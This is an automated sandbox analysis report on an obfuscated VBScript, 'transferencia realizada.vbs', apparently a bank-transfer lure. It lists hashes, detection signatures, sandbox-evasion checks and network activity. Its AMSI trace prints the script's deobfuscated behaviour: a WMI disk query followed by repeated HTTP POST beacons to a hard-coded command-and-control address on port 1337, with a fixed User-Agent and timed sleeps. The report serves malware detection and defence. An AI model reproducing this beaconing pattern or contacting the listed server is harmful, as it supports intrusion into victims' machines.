Windows Analysis Report
transferencia realizada.vbs

Overview

General Information

Sample name: transferencia realizada.vbs
Analysis ID: 1524394
MD5: fe893f789402eafdc09336f38f8de977
SHA1: 2360cdc1b14776d0463835fa440ba12a7d131a2f
SHA256: ceca7c78597817148e841c0744f96167e67bb3e08244e923b44006f5768bf0fe
Tags: vbs, user-N3utralZ0ne

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Potential malicious VBS script found (has network functionality)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Program does not show much activity (idle)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

AV Detection

Source: Submitted Sample Integrated Neural Analysis Model: Matched 95.7% probability

Networking

Source: Initial file: xx.SetRequestHeader "User-Agent", gg
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 1337
Source: global traffic TCP traffic: 192.168.2.7:49700 -> 185.244.29.74:1337
Source: Joe Sandbox View ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknown HTTP traffic detected: POST /document HTTP/1.1Accept: */*User-Agent: B81A4609Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.244.29.74:1337Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD38FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74/:
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD11DD000.00000004.00000020.00020000.00000000.sdmp, transferencia realizada.vbs String found in binary or memory: http://185.244.29.74:1337/document
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:1337/document-E
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:1337/document-L
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:1337/document.L
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:1337/document2
Source: wscript.exe, 00000000.00000002.3744902769.000001BCD3075000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:1337/documentY
Source: wscript.exe, 00000000.00000002.3744902769.000001BCD3075000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:1337/documentZ
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD11DD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:1337/document_q
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:1337/documentfE
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD123C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:1337/documentp
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD38FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com

System Summary

Source: C:\Windows\System32\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: transferencia realizada.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal76.troj.evad.winVBS@1/0@0/1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia realizada.vbs"
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", 
"B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServe

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 1337
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 1337
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD11DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD11DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWZN
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid